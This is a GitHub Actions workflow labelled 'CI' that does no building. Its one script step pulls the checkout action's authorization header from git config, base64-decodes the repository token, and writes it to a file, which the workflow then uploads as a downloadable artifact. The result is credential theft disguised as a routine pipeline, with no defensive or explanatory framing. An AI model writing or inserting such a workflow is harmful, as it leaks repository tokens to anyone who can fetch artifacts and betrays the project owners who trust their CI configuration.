name: CI

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Run a script
        run: |
          HEADER=$(git config --get-all http.https://github.com/.extraheader)
          echo "Raw header:" > output.txt
          echo "$HEADER" >> output.txt
          TOKEN=$(echo "$HEADER" | sed 's/AUTHORIZATION: basic //')
          echo "Decoded token:" >> output.txt
          echo "$TOKEN" | base64 -d >> output.txt

      - name: Upload output file
        uses: actions/upload-artifact@v4
        with:
          name: output-file
          path: output.txt

